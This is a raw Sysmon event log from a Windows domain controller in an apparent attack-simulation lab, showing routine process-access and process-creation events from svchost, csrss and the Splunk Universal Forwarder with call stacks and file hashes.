12:02:54.133{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008164Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.133{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008163Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.133{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008162Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.133{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008161Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.133{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-DC00-00000000AE01}7080C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008160Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.133{266CAFBE-64EE-6064-DB00-00000000AE01}70607064C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-64EE-6064-DC00-00000000AE01}7080C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+146d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008159Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.139{266CAFBE-64EE-6064-DC00-00000000AE01}7080C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64EE-6064-DB00-00000000AE01}7060C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000008158Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.117{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-DB00-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008157Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.117{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008156Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.117{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008155Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.117{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008154Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.117{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008153Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.117{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-DB00-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008152Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.117{266CAFBE-64EE-6064-DA00-00000000AE01}53447052C:\Windows\system32\cmd.exe{266CAFBE-64EE-6064-DB00-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
154100x80000000000000008151Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.126{266CAFBE-64EE-6064-DB00-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{266CAFBE-64EE-6064-DA00-00000000AE01}5344C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000008150Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.117{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-DA00-00000000AE01}5344C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008149Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.117{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008148Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.117{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008147Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.117{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008146Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.117{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008145Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.117{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-DA00-00000000AE01}5344C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008144Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.117{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64EE-6064-DA00-00000000AE01}5344C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7d48|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008143Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.120{266CAFBE-64EE-6064-DA00-00000000AE01}5344C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
10341000x80000000000000008142Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.101{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008141Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.101{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-D900-00000000AE01}5308C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008140Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.101{266CAFBE-646A-6064-0A00-00000000AE01}8403012C:\Windows\system32\services.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000008139Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.086{266CAFBE-64EE-6064-D700-00000000AE01}65925340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-D800-00000000AE01}6628C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008138Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.086{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008137Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.086{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008136Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.086{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008135Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
